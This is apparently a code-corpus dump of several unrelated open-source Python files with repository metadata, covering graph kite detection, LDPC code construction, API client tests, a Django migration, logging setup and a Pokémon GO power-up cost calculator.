for j in range(i+1,len(G)-1):
if j in e:
continue
if G[i][j] == 1:
for k in range(j+1,len(G)):
if k in e:
continue
#if v:
# print i,j,k
if G[i][k]==1 and G[j][k]==1:
#if v:
# print i, j, k, "found"
# We have a triangle.
#for l in range(k+1, len(G)):
for l in range(len(G)):
if l in e:
continue
if G[l][i]==1 and G[l][j]==1:
L.append((l, k))
if G[l][i]==1 and G[l][k]==1:
L.append((l, j))
if G[l][k]==1 and G[l][j]==1:
L.append((l, i))
return L
# returns true if double kite, kite edge list otherwise.
def isLeafOnEdge(G, e, edgeList):
newEdges = getKiteEdgesOnEdge(G,e)
#if not newEdges:
# return edgeList
#edgeList = getKiteEdgesEx(G,e)
#print newEdges
#print edgeList
fullList = newEdges.union(edgeList)
for e1 in newEdges:
for e2 in fullList:
if e1 == e2:
continue
if e1[0] == e2[0] and G[e1[1]][e2[1]]:
return True, getEdgesFromKite(G, (e1[0], e1[1], e2[1]))
elif e1[0] == e2[1] and G[e1[1]][e2[0]]:
return True, getEdgesFromKite(G, (e1[0], e1[1], e2[0]))
elif e1[1] == e2[0] and G[e1[0]][e2[1]]:
return True, getEdgesFromKite(G, (e1[1], e1[0], e2[1]))
elif e1[1] == e2[1] and G[e1[0]][e2[0]]:
return True, getEdgesFromKite(G, (e1[1], e1[0], e2[0]))
# check if this edge is the base of a double kite.
# this might be wrong
for e1 in fullList:
if e[0] in e1:
for e2 in fullList:
if e1 == e2:
continue
if e[1] in e2:
if e2[0] in e1 or e2[1] in e1:
if e1[0] == e2[0] or e1[0] == e2[1]:
v = e1[0]
elif e1[1] == e2[0] or e1[1] == e2[1]:
v = e1[1]
return True, getEdgesFromKite(G, (v, e[0], e[1]))
return False, fullList
# returns true if double kite, kite edge list otherwise.
def isLeafOnEdgeAlt(G, e, edgeList):
newEdges = getKiteEdgesOnEdge(G,e)
#if not newEdges:
# return edgeList
#edgeList = getKiteEdgesEx(G,e)
#print newEdges
#print edgeList
fullList = newEdges.union(edgeList)
for e1 in newEdges:
for e2 in fullList:
if e1 == e2:
continue
if e1[0] == e2[0] and G[e1[1]][e2[1]]:
return True, (e1[0], e1[1], e2[1])
elif e1[0] == e2[1] and G[e1[1]][e2[0]]:
return True, (e1[0], e1[1], e2[0])
elif e1[1] == e2[0] and G[e1[0]][e2[1]]:
return True, (e1[1], e1[0], e2[1])
elif e1[1] == e2[1] and G[e1[0]][e2[0]]:
return True, (e1[1], e1[0], e2[0])
# check if this edge is the base of a double kite.
# this might be wrong
for e1 in fullList:
if e[0] in e1:
for e2 in fullList:
if e1 == e2:
continue
if e[1] in e2:
if e2[0] in e1 or e2[1] in e1:
if e1[0] == e2[0] or e1[0] == e2[1]:
v = e1[0]
elif e1[1] == e2[0] or e1[1] == e2[1]:
v = e1[1]
return True, (v, e[0], e[1])
return False, fullList
# returns true if double kite, false otherwise
# performance seems to be unimpressive
def hasDoubleKiteOnEdge(G,e):
for i in xrange(len(G)):
if i in e:
continue
if G[i][e[0]] and G[i][e[1]]:
# Triangle.
#print "Triangle", e[0], e[1], i
for j in xrange(len(G)):
if j in e or j == i:
continue
v = None
#print "j:", j, e, i
if G[j][e[0]] and G[j][e[1]]:
v = i
elif G[j][e[0]] and G[j][i]:
v = e[1]
elif G[j][e[1]] and G[j][i]:
v = e[0]
#print v
if v != None:
# Single Kite!
#print "Single Kite", e[0], e[1], i, j, v
for x in (v,j):
#print "x =", x
for k in xrange(len(G)):
#print "k:", k
if k in (v,j):
continue
if G[x][k]:
#print "Bonus edge on", k
for l in xrange(len(G)):
if l in (e[0],e[1],i,j,k):
continue
#print "l:", l
if G[k][l] and G[x][l]:
# annother triangle!
#print "Annother Triangle"
#print e[0], e[1], i, j, k, l
for m in xrange(len(G)):
if m in (e[0],e[1],i,j,k,l):
continue
if (G[m][j] or G[m][v]) and G[m][k] and G[m][l]:
return True
#print e
# Not part of a triangle. Is the new edge the connecting edge in any pair of double kites?
for i in xrange(len(G)-1):
if i in e:
continue
if G[e[0]][i]:
for j in xrange(i+1,len(G)):
if j in e:
continue
if G[e[0]][j] and G[e[0]][i] and G[i][j]:
# Triangle!
#print "Triangle:", e[0], i, j
for k in xrange(len(G)):
if k in e + (i,j):
continue
if G[i][k] and G[j][k]:
# Sinlge kite!
# k is the top of our kite.
#print "Kite:", k
for l in xrange(len(G)):
if l in e + (i,j,k):
continue
if G[l][k] and G[l][e[1]]:
# bridge between end of edge and top of kite
#print "Bridge:", l
for m in xrange(len(G)):
if m in e + (i,j,k,l):
continue
if G[m][l] and G[m][k] and G[m][e[1]]:
#print "Double:", m
return True
return False
| 31.809917 | 108 | 0.412679 |
3aac3f6414867b633dea9c7d45394cdd79f87b50 | 39 | py | Python | cont.py | peterkimutai/continue1 | fe6dd88f6beeb0a93a41deef942d753b0d914cbc | [
"Unlicense"
] | null | null | null | cont.py | peterkimutai/continue1 | fe6dd88f6beeb0a93a41deef942d753b0d914cbc | [
"Unlicense"
] | null | null | null | cont.py | peterkimutai/continue1 | fe6dd88f6beeb0a93a41deef942d753b0d914cbc | [
"Unlicense"
] | null | null | null |
i="meee"
u="you"
print(i," and ",u)
| 5.571429 | 18 | 0.487179 |
3aac4e1d77f4bf335aa448746527f97c1db73e42 | 2,085 | py | Python | tests/test_api.py | sebaacuna/bigcommerce-api-python | 59ef206d7296c196a0ae0400b6bf9bdb5c2f72af | [
"MIT"
] | null | null | null | tests/test_api.py | sebaacuna/bigcommerce-api-python | 59ef206d7296c196a0ae0400b6bf9bdb5c2f72af | [
"MIT"
] | null | null | null | tests/test_api.py | sebaacuna/bigcommerce-api-python | 59ef206d7296c196a0ae0400b6bf9bdb5c2f72af | [
"MIT"
] | null | null | null | import unittest
import bigcommerce.api
from bigcommerce.connection import Connection, OAuthConnection
from bigcommerce.resources import ApiResource
from mock import MagicMock, patch, Mock
class TestBigcommerceApi(unittest.TestCase):
""" Test API client creation and helpers"""
def test_create_basic(self):
api = bigcommerce.api.BigcommerceApi(host='store.mybigcommerce.com', basic_auth=('admin', 'abcdef'))
self.assertIsInstance(api.connection, Connection)
self.assertNotIsInstance(api.connection, OAuthConnection)
def test_create_oauth(self):
api = bigcommerce.api.BigcommerceApi(client_id='123456', store_hash='abcdef', access_token='123abc')
self.assertIsInstance(api.connection, OAuthConnection)
def test_create_incorrect_args(self):
self.assertRaises(Exception, lambda: bigcommerce.api.BigcommerceApi(client_id='123', basic_auth=('admin', 'token')))
class TestApiResourceWrapper(unittest.TestCase):
def test_create(self):
api = MagicMock()
api.connection = MagicMock()
wrapper = bigcommerce.api.ApiResourceWrapper('ApiResource', api)
self.assertEqual(api.connection, wrapper.connection)
self.assertEqual(wrapper.resource_class, ApiResource)
wrapper = bigcommerce.api.ApiResourceWrapper(ApiResource, api)
self.assertEqual(wrapper.resource_class, ApiResource)
def test_str_to_class(self):
cls = bigcommerce.api.ApiResourceWrapper.str_to_class('ApiResource')
self.assertEqual(cls, ApiResource)
self.assertRaises(AttributeError, lambda: bigcommerce.api.ApiResourceWrapper.str_to_class('ApiResourceWhichDoesNotExist'))
@patch.object(ApiResource, 'get')
def test_get_attr(self, patcher):
api = MagicMock()
api.connection = MagicMock()
result = {'id': 1}
patcher.return_value = result
wrapper = bigcommerce.api.ApiResourceWrapper('ApiResource', api)
self.assertEqual(wrapper.get(1), result)
patcher.assert_called_once_with(1, connection=api.connection)
| 36.578947 | 130 | 0.729976 |
3aad54a74724c543c7739f87f3d7419f9de3dd0e | 638 | py | Python | media.py | anuraglahon16/Make_a_movie_website | 4d5371b7cc1286f2444376a221595d8c6bb0d492 | [
"MIT"
] | null | null | null | media.py | anuraglahon16/Make_a_movie_website | 4d5371b7cc1286f2444376a221595d8c6bb0d492 | [
"MIT"
] | null | null | null | media.py | anuraglahon16/Make_a_movie_website | 4d5371b7cc1286f2444376a221595d8c6bb0d492 | [
"MIT"
] | null | null | null | """Defines the Movie class"""
import webbrowser
class Movie(object):
"""This class provides a way to store movie related information."""
def __init__(self, movie_title, movie_storyline, poster_image,
trailer_youtube, movie_release_date):
self.title = movie_title
self.storyline = movie_storyline
self.poster_image_url = poster_image
self.trailer_youtube_url = trailer_youtube
self.release_date = movie_release_date
def show_trailer(self):
"""Plays the movie trailer in the web browser."""
webbrowser.open(self.trailer_youtube_url)
| 33.578947 | 72 | 0.677116 |
3aad9a8258616eab59c6be93afe08dd7ebf88b02 | 722 | py | Python | slalom/migrations/0003_auto_20210502_2148.py | caro-oviedo/DjangoApp2-UserProgress-Salom | 5f3adf796764dd880f4761c818997f75516f2c24 | [
"Apache-2.0"
] | null | null | null | slalom/migrations/0003_auto_20210502_2148.py | caro-oviedo/DjangoApp2-UserProgress-Salom | 5f3adf796764dd880f4761c818997f75516f2c24 | [
"Apache-2.0"
] | null | null | null | slalom/migrations/0003_auto_20210502_2148.py | caro-oviedo/DjangoApp2-UserProgress-Salom | 5f3adf796764dd880f4761c818997f75516f2c24 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 3.2 on 2021-05-02 21:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('slalom', '0002_remove_trick_owner'),
]
operations = [
migrations.AddField(
model_name='trick',
name='video1',
field=models.CharField(default='1', max_length=250),
),
migrations.AddField(
model_name='trick',
name='video2',
field=models.CharField(default='2', max_length=250),
),
migrations.AddField(
model_name='trick',
name='video3',
field=models.CharField(default='3', max_length=250),
),
]
| 24.896552 | 64 | 0.558172 |
3ab1c994ef22b2ed6be0bfd91c5d34915c683650 | 629 | py | Python | sync_binlog/output_log.py | liusl104/py_sync_binlog | 33a67f545159767d38a522d28d2f79b3ac3802ca | [
"Apache-2.0"
] | 3 | 2018-09-18T03:29:33.000Z | 2020-01-13T03:34:39.000Z | sync_binlog/output_log.py | liusl104/py_sync_binlog | 33a67f545159767d38a522d28d2f79b3ac3802ca | [
"Apache-2.0"
] | null | null | null | sync_binlog/output_log.py | liusl104/py_sync_binlog | 33a67f545159767d38a522d28d2f79b3ac3802ca | [
"Apache-2.0"
] | 1 | 2022-01-25T09:39:17.000Z | 2022-01-25T09:39:17.000Z | # encoding=utf8
import logging # 引入logging模块
from logging.handlers import TimedRotatingFileHandler
from sync_conf import log_bese_path, log_backup_count, log_msg_level
# 日志
logfile = log_bese_path + '/logs/' + 'binlog_sync.log'
logger = logging.getLogger()
logger.setLevel(log_msg_level)
# 按日分割日志,默认日志保留7份
fh = TimedRotatingFileHandler(logfile, when='D', interval=1, backupCount=log_backup_count)
# datefmt = '%Y-%m-%d %H:%M:%S'
format_str = "%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s"
formatter = logging.Formatter(format_str, datefmt=None)
fh.setFormatter(formatter)
logger.addHandler(fh)
| 28.590909 | 90 | 0.761526 |
3ab2efc455ab899be68173e51b6cd65e6052c754 | 12,208 | py | Python | src/LDPC/pycodes/build/lib.cygwin-1.5.10-i686-2.3/pycodes/utils/CodeMaker.py | Horacehxw/Multi-label | 76095c72327e9aa379eaa653dbbb775ca638e6db | [
"MIT"
] | 1 | 2019-04-24T15:24:48.000Z | 2019-04-24T15:24:48.000Z | src/LDPC/pycodes/utils/CodeMaker.py | Horacehxw/Multi-label | 76095c72327e9aa379eaa653dbbb775ca638e6db | [
"MIT"
] | null | null | null | src/LDPC/pycodes/utils/CodeMaker.py | Horacehxw/Multi-label | 76095c72327e9aa379eaa653dbbb775ca638e6db | [
"MIT"
] | null | null | null | """
Copyright 2003 Mitsubishi Electric Research Laboratories All Rights
Reserved. Permission to use, copy and modify this software and its
documentation without fee for educational, research and non-profit
purposes, is hereby granted, provided that the above copyright
notice and the following three paragraphs appear in all copies.
To request permission to incorporate this software into commercial
products contact: Vice President of Marketing and Business
Development; Mitsubishi Electric Research Laboratories (MERL), 201
Broadway, Cambridge, MA 02139 or <license@merl.com>.
IN NO EVENT SHALL MERL BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT,
SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOST
PROFITS, ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS
DOCUMENTATION, EVEN IF MERL HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
MERL SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN
``AS IS'' BASIS, AND MERL HAS NO OBLIGATIONS TO PROVIDE MAINTENANCE,
SUPPORT, UPDATES, ENHANCEMENTS OR MODIFICATIONS.
"""
"""
The CodeMaker package contains function to create regular and irregular
Gallager codes. For example, to create a 3,6 Gallager code
of block length 30 and dimension 15, you could do
>>> regL = make_H_gallager(30,3,6)
To create an irregular Gallager code with 4 variables of degree 1,
4 variables of degree 2, 2 variables of degree 3, 3 checks of degree 2,
and 4 checks of degree 3, you could do
>>> iregL = MakeIrregularLDPCCode(10,3,{1:4,2:4,3:2},{2:3,3:4})
To create an irregular Gallager code with degree sequences
lambda(x) = 0.33241 x^2 + 0.24632 x^3 + 0.11014 x^4 + 0.31112 x^6
rho(x) = 0.76611 x^6 + 0.23380 x^7 you could do
>>> iregL = MakeIrregularLDPCCodeFromLambdaRho(30,15,{2:0.33241, 3:.24632, 4:.11014, 6:0.31112},{6:.76611, 7:.23389})
Finally, note that although it is possible to make regular
Gallager codes using the Irregular code functions,
YOU SHOULD NOT DO THAT. The irregular code functions
only give you approximatley the degree sequence you request
due to issues with randomly adding edges and removing
redundant edges.
"""
import time, copy, random
CodeMakerVersion = 1.0
def DotProduct(x,y):
return reduce(lambda a,b: a+b,map(lambda a,b: a*b, x,y))
def randperm(N):
"randperm(N): Return a random permuation of [0,1,...,N-1]."
result = [None]*N
for i in range(N):
index = random.randrange(N)
while (result[index] != None):
index = random.randrange(N)
result[index] = i
return result
def make_H_gallager(N,col_w,row_w):
"""
make_H_gallager(N,col_w,row_w):
N: Length of code.
col_w: Column weight of code (i.e., how many 1's in a column).
row_w: Row weight of code (i.e., how many 1's in a row).
Create a regular LDPC code matrix using the construction in
Gallager's book and return the result as a link array. The
return value, r, is a list of N lists where r[i][j] is the
ith one in the jth row of H.
The algorithm works by starting with a sub-matrix of n/row_w rows
containing col_w 1's in the first positions in the first row,
col_w 1's in the next set of positions in the second row, etc.
H = [ 1 1 1 1 0 0 0 0 0 0 0 0 ...
0 0 0 0 1 1 1 1 0 0 0 0 ...
0 0 0 0 0 0 0 0 1 1 1 1 ...
...........................
Next we create col_w-1 additional submatricies which are permuations of
this and append them to the bottom of H.
"""
num_rows = (N * col_w) / row_w
num_sub_rows = num_rows / col_w
assert row_w*num_rows == N*col_w, 'N*col_w not divisible by row_w'
assert (N/row_w)*row_w == N, 'N not divisible by row_w'
H_sub = [0]*num_sub_rows
for i in range(num_sub_rows):
H_sub[i] = map(lambda x,y: x + y,[i*row_w]*row_w,range(row_w))
H = copy.deepcopy(H_sub)
for i in range(col_w-1):
H_new_sub = [0]*num_sub_rows
for m in range(num_sub_rows):
H_new_sub[m] = [0]*row_w
rand_perm = randperm(N)
for j in range(num_sub_rows):
for k in range(row_w):
H_new_sub[j][k] = rand_perm[H_sub[j][k]]
l = list(H_new_sub[j])
l.sort()
H_new_sub[j] = l
H = H + copy.deepcopy(H_new_sub)
return H
def WriteNewRegularGallagerCode(N,col_w,row_w,fileName):
"""
Routine to create a new Gallager Code and write it to a file.
"""
fd = open(fileName,'w')
fd.write('# Created code using CodeMaker.py version ' + `CodeMakerVersion`
+ '.\n# Random seed = ' + `random.getstate()` + '.\n')
fd.write('# Command used = WriteNewRegularGallagerCode(%i,%i,%i,"%s") '
% (N, col_w, row_w, fileName))
fd.write('\n\nlinkArray = ' + `make_H_gallager(N,col_w,row_w)`)
fd.write('\n\n')
fd.close()
def MakeIrregularLDPCCode(N,K,varDegrees,checkDegrees):
"""
MakeIrregularLDPCCode(N,K,checkDegrees,varDegrees):
N: Length of the code.
K: Dimension of the code.
checkDegrees: Hash indicating how many checks have 1 connection,
2 connections, 3 connections, etc.
varDegrees: Hash indicating how many vars have 1 connection,
2 connections, 3 connections, etc.
Returns a a list L which is a randomly constructed link
array for the desired code. Note the current approach of
preventing multi-edges is to not add a redundant edge. This
ends up producing a graph with slightly lower degrees than
specified. If instead we keep trying to add edges to
exactly match the desired degrees the function sometimes
gets stuck and doesn't finish.
"""
M = N - K
numChecks = reduce(lambda x,y:x+y, checkDegrees.values())
assert numChecks == M, (
'Number of checks in checkDegrees sums to ' + `numChecks` +
'!=' + `M` + '.')
assert reduce(lambda x,y:x+y, varDegrees.values()) == N, (
'Number of vars in varDegrees does not sum to N.')
edgesFromChecks = DotProduct(checkDegrees.keys(),checkDegrees.values())
edgesFromVars = DotProduct(varDegrees.keys(),varDegrees.values())
assert edgesFromVars == edgesFromChecks, (
'# edges from vars != # edges from checks:' +
`edgesFromVars` + ' != ' + `edgesFromChecks`)
assert N > max(checkDegrees.keys())
assert M > max(varDegrees.keys())
result = [0]*M
vars = []
curVarIndex = 0
for d in varDegrees.keys(): # for each possible var degree
for i in range(varDegrees[d]): # for each of var with that degree
vars.extend([curVarIndex]*d)
curVarIndex = curVarIndex+1
assert curVarIndex==N
curCheckIndex = 0
for d in checkDegrees.keys(): # for each possible check degree
for i in range(checkDegrees[d]): # for each check with that degree
result[curCheckIndex] = [None]*d
for connectionForCheck in range(d):
vIndex = random.randrange(len(vars))
if (result[curCheckIndex].count(vars[vIndex]) == 0):
result[curCheckIndex][connectionForCheck]=vars.pop(vIndex)
else:
print 'warning not adding multi-edge'
vars.pop(vIndex)
while (result[curCheckIndex].count(None)>0):
result[curCheckIndex].pop(result[curCheckIndex].index(None))
curCheckIndex = curCheckIndex + 1
assert len(vars)==0, 'vars should be empty but it is' + `vars`
return result
def IntegrateLambdaOrRho(terms):
"""
IntegrateLambdaOrRho(terms):
terms: A hash table containing lambda or rho coefficients.
For example, if lambda(x) = .4 x^2 + .6 x^3, then
the input would be {2:.4, 3:.6}.
Returns The integral of the argument from 0 to 1.
"""
sum = 0
total = 0
for i in terms.keys():
sum = sum + terms[i]
total = total + terms[i]/float(i)
assert(abs(sum-1.0) < .0001)
return total
def LambdaRhoToDegreeSequences(N,M,lam,rho):
"""
N: Block size.
M: Number of constraints.
lam: A hash table specifying the variable degress using the lambda
notation. Specifically, lam[i] = p denotes that the fraction
of EDGES coming from a variable node of degree i is p.
rho: A hash table specifying the check degress using the rho
notation. Specifically, rho[i] = p denotes that the fraction
of EDGES coming from a check node of degree i is p.
Returns a pair of hash tables (varDegrees, checkDegrees) where
varDegress[i] = y indicates that there are y varialbes of degree i.
"""
totalVarEdges = float(N)/IntegrateLambdaOrRho(lam)
totalCheckEdges = float(M)/IntegrateLambdaOrRho(rho)
varDegrees = {}
for key in lam.keys():
varDegrees[key] = int(round(totalVarEdges*lam[key]/float(key)))
checkDegrees = {}
for key in rho.keys():
checkDegrees[key] = int(round(totalCheckEdges*rho[key]/float(key)))
return (varDegrees,checkDegrees)
def ComputeEdgeMismatch(varDegrees,checkDegrees):
edgesFromChecks = DotProduct(checkDegrees.keys(),checkDegrees.values())
edgesFromVars = DotProduct(varDegrees.keys(),varDegrees.values())
edgeMismatch = edgesFromChecks-edgesFromVars
return edgeMismatch
def MakeIrregularLDPCCodeFromLambdaRho(N,K,lam,rho):
"""
MakeIrregularLDPCCodeFromLambdaRho(N,K,lam,rho):
N: Block size.
K: Dimension.
lam: A hash table specifying the variable degress using the lambda
notation. Specifically, lam[i] = p denotes that the fraction
of EDGES coming from a variable node of degree i is p.
rho: A hash table specifying the check degress using the rho
notation. Specifically, rho[i] = p denotes that the fraction
of EDGES coming from a check node of degree i is p.
This function creates an irregular LDPC code for the desired parameters.
"""
M=N-K
total = 0
(varDegrees,checkDegrees) = LambdaRhoToDegreeSequences(N,M,lam,rho)
for key in checkDegrees.keys():
total = total + checkDegrees[key]
cCleanupIndex = checkDegrees.values().index(max(checkDegrees.values()))
cCleanupIndex = checkDegrees.keys()[cCleanupIndex]
checkDegrees[cCleanupIndex] = checkDegrees[cCleanupIndex] - (total-M)
assert checkDegrees[cCleanupIndex] > 0
total = 0
for key in varDegrees.keys():
total = total + varDegrees[key]
vCleanupIndex = varDegrees.values().index(max(varDegrees.values()))
vCleanupIndex = varDegrees.keys()[vCleanupIndex]
varDegrees[vCleanupIndex] = varDegrees[vCleanupIndex] - (total-N)
assert varDegrees[vCleanupIndex] > 0
edgeMismatch = ComputeEdgeMismatch(varDegrees, checkDegrees)
print 'Cleaning up edge mismatch of ', edgeMismatch
k = varDegrees.keys()
k.sort()
degreeDiff = k[1]-k[0]
edgeDiff = edgeMismatch/degreeDiff +1
varDegrees[k[0]]=varDegrees[k[0]]-edgeDiff
varDegrees[k[1]]=varDegrees[k[1]]+edgeDiff
assert varDegrees[k[0]] > 0
assert varDegrees[k[1]] > 0
edgeMismatch = ComputeEdgeMismatch(varDegrees,checkDegrees)
k = checkDegrees.keys()
k.sort()
if (edgeMismatch < 0):
checkDegrees[k[0]] = checkDegrees[k[0]] - 1
edgeMismatch = edgeMismatch - k[0]
if (not checkDegrees.has_key(-edgeMismatch)):
checkDegrees[-edgeMismatch]=0
checkDegrees[-edgeMismatch]=checkDegrees[-edgeMismatch]+1
print 'Adding one check of degree', -edgeMismatch, 'to fix mismatch.'
else:
# haven't yet implemented this case
assert 0
print 'using -->', varDegrees, checkDegrees
return MakeIrregularLDPCCode(N,K,varDegrees,checkDegrees)
| 38.755556 | 117 | 0.648263 |
3ab3e2941b6f403af41700077d7767ce4d038166 | 457 | py | Python | catalyst/contrib/nn/modules/__init__.py | denyhoof/catalyst | a340450076f7846007bc5695e5163e15b7ad9575 | [
"Apache-2.0"
] | 1 | 2020-09-24T00:34:06.000Z | 2020-09-24T00:34:06.000Z | catalyst/contrib/nn/modules/__init__.py | denyhoof/catalyst | a340450076f7846007bc5695e5163e15b7ad9575 | [
"Apache-2.0"
] | null | null | null | catalyst/contrib/nn/modules/__init__.py | denyhoof/catalyst | a340450076f7846007bc5695e5163e15b7ad9575 | [
"Apache-2.0"
] | 1 | 2020-09-24T00:34:07.000Z | 2020-09-24T00:34:07.000Z | # flake8: noqa
from torch.nn.modules import *
from .common import Flatten, GaussianNoise, Lambda, Normalize
from .lama import LamaPooling, TemporalAttentionPooling, TemporalConcatPooling
from .pooling import (
GlobalAttnPool2d,
GlobalAvgAttnPool2d,
GlobalAvgPool2d,
GlobalConcatAttnPool2d,
GlobalConcatPool2d,
GlobalMaxAttnPool2d,
GlobalMaxPool2d,
)
from .rms_norm import RMSNorm
from .se import (
sSE,
scSE,
cSE,
)
| 21.761905 | 78 | 0.750547 |
3ab4a94d8c1d32caca854e9194abb1b42f0cfa0c | 1,559 | py | Python | pogopowerupcost/pogopowerupcost.py | HankB/pogopowerupcost | 348f2414029b15909b82ea109429b8f96937f019 | [
"MIT"
] | null | null | null | pogopowerupcost/pogopowerupcost.py | HankB/pogopowerupcost | 348f2414029b15909b82ea109429b8f96937f019 | [
"MIT"
] | null | null | null | pogopowerupcost/pogopowerupcost.py | HankB/pogopowerupcost | 348f2414029b15909b82ea109429b8f96937f019 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding=utf-8
"""
Strategy to eliminate redundant lines.
- remove redundant lines
- calculate the correct key for a given level
"""
NORMAL_COST_PER_POWERUP = {
# level: [stardust, candy]
2.5: [ 200, 1],
4.5: [ 400, 1],
6.5: [ 600, 1],
8.5: [ 800, 1],
10.5: [ 1000, 1],
12.5: [ 1300, 2],
14.5: [ 1600, 2],
16.5: [ 1900, 2],
18.5: [ 2200, 2],
20.5: [ 2500, 2],
22.5: [ 3000, 3],
24.5: [ 3500, 3],
26.5: [ 4000, 3],
28.5: [ 4500, 3],
30.5: [ 5000, 4],
32.5: [ 6000, 6],
34.5: [ 7000, 8],
36.5: [ 8000, 10],
38.5: [ 9000, 12],
40.5: [10000, 15], # Unconfirmed
}
SHADOW_COST_PER_POWERUP = {
# level: [stardust, candy]
2.5: [ 240, 2],
4.5: [ 480, 2],
6.5: [ 720, 2],
8.5: [ 960, 2],
10.5: [ 1200, 2],
12.5: [ 1560, 3],
14.5: [ 1920, 3],
16.5: [ 2280, 3],
18.5: [ 2640, 3],
20.5: [ 3000, 3],
22.5: [ 3600, 4],
24.5: [ 4200, 4],
26.5: [ 4800, 5],
28.5: [ 5400, 5],
30.5: [ 6000, 8],
32.5: [ 7200, 10],
34.5: [ 8400, 10],
36.5: [ 9600, 12],
38.5: [ 10800, 15],
40.5: [ 12000, 18], # Unconfirmed
}
def get_table_key(level):
return level-((level+1) % 2)+1.5
def calculate_powerup_cost(from_level, to_level, cost_table=NORMAL_COST_PER_POWERUP):
total_stardust = 0
total_candy = 0
while from_level < to_level:
table_key = get_table_key(from_level)
stardust, candy = cost_table[table_key]
total_stardust += stardust
total_candy += candy
from_level += 0.5
return {
'stardust': total_stardust,
'candy': total_candy,
}
| 21.067568 | 85 | 0.550994 |
3ab542c9882e6ca1b34d6c4578175afe66cf3890 | 516 | py | Python | Source/Ventanas/login.py | NicolasTangredi/grupo4 | 4261f34c6600409434fc548d764dbb43bfb9c2f1 | [
"MIT"
] | null | null | null | Source/Ventanas/login.py | NicolasTangredi/grupo4 | 4261f34c6600409434fc548d764dbb43bfb9c2f1 | [
"MIT"
] | null | null | null | Source/Ventanas/login.py | NicolasTangredi/grupo4 | 4261f34c6600409434fc548d764dbb43bfb9c2f1 | [
"MIT"
] | null | null | null | import PySimpleGUI as sg
def build_login():
""" Construye la ventana del inicio de sesion del usuario"""
layout =[[sg.T("Usuario", size=(8,1)), sg.InputText(key='-USER-')],
[sg.T("Contraseña", size=(8,1)), sg.InputText(key='-PASS-')],
[sg.Submit("LogIn", size=(15,1), pad=(0,15))],
[sg.T("No estas registrado?")],
[sg.Button('Registrarse', size=(15,1))]]
window = sg.Window('Inicio de sesion', layout, element_justification='center')
return window
| 34.4 | 82 | 0.585271 |
3ab65f9233f5b33fe212c56ac9a65bed2532c487 | 446 | py | Python | tests/core/test_formatter.py | My-Novel-Management/storybuilderunite | c003d3451e237f574c54a87ea7d4fd8da8e833be | [
"MIT"
] | 1 | 2020-06-18T01:38:55.000Z | 2020-06-18T01:38:55.000Z | tests/core/test_formatter.py | My-Novel-Management/storybuilder | 1f36e56a74dbb55a25d60fce3ce81f3c650f521a | [
"MIT"
] | 143 | 2019-11-13T00:21:11.000Z | 2020-08-15T05:47:41.000Z | tests/core/test_formatter.py | My-Novel-Management/storybuilderunite | c003d3451e237f574c54a87ea7d4fd8da8e833be | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Formatter class test
====================
'''
import unittest
from tests.testutils import print_testtitle, validate_with_fail
from builder.core import formatter as fm
class FormatterTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
print_testtitle(fm.__name__, 'Formatter class')
def test_instance(self):
tmp = fm.Formatter()
self.assertIsInstance(tmp, fm.Formatter)
| 20.272727 | 63 | 0.674888 |
3ab8056bbcfb11d7cb0f257beb6843279b5e80cf | 86 | py | Python | reliabilipy/__init__.py | rafaelvalero/omegapy | 5cc6288f9b0d6101de87229ce0f3a392ff3d1e8a | [
"MIT"
] | 1 | 2022-01-08T20:46:43.000Z | 2022-01-08T20:46:43.000Z | reliabilipy/__init__.py | rafaelvalero/omegapy | 5cc6288f9b0d6101de87229ce0f3a392ff3d1e8a | [
"MIT"
] | null | null | null | reliabilipy/__init__.py | rafaelvalero/omegapy | 5cc6288f9b0d6101de87229ce0f3a392ff3d1e8a | [
"MIT"
] | null | null | null | from ._reliabili import reliability_analysis
__all__ = [
"reliability_analysis",
] | 21.5 | 44 | 0.77907 |
3aba1d78d37e1173705ea143efeb8730018f6cb1 | 1,296 | py | Python | pynasqm/trajectories/get_reference_job.py | PotentialParadox/pynasqm | 1bd51299b6ca7f8229d8a15428515d53a358903c | [
"MIT"
] | 1 | 2020-03-13T22:34:03.000Z | 2020-03-13T22:34:03.000Z | pynasqm/trajectories/get_reference_job.py | PotentialParadox/pynasqm | 1bd51299b6ca7f8229d8a15428515d53a358903c | [
"MIT"
] | null | null | null | pynasqm/trajectories/get_reference_job.py | PotentialParadox/pynasqm | 1bd51299b6ca7f8229d8a15428515d53a358903c | [
"MIT"
] | null | null | null | from functools import singledispatch
from pynasqm.trajectories.fluorescence import Fluorescence
from pynasqm.trajectories.absorption import Absorption
@singledispatch
def get_reference_job(traj_data):
raise NotImplementedError(f"traj_data type not supported by get_refer\n"\
f"{traj_data}")
@get_reference_job.register(Fluorescence)
def _(traj_data):
return "qmexcited"
@get_reference_job.register(Absorption)
def _(traj_data):
return "qmground"
@singledispatch
def get_n_trajs_of_reference(traj_data):
raise NotImplementedError(f"traj_data type not supported by get_ntrajs_of_reference\n"\
f"{traj_data}")
@get_n_trajs_of_reference.register(Fluorescence)
def _(traj_data):
return traj_data.user_input.n_snapshots_ex
@get_n_trajs_of_reference.register(Absorption)
def _(traj_data):
return traj_data.user_input.n_snapshots_qmground
@singledispatch
def get_n_ref_runs(traj_data):
raise NotImplementedError(f"traj_data type not supported by get_nref_runs\n"\
f"{traj_data}")
@get_n_ref_runs.register(Fluorescence)
def _(traj_data):
return traj_data.user_input.n_exc_runs
@get_n_ref_runs.register(Absorption)
def _(traj_data):
return traj_data.user_input.n_qmground_runs
| 35.027027 | 91 | 0.765432 |
3aba773aa612d9acfa1ae100f08af08822858dc4 | 6,283 | py | Python | tests/fire_groups/test_damage_profile.py | spascou/ps2-analysis | 00f99b009d15d4c401a3338ddd0408ac7eedcc0b | [
"MIT"
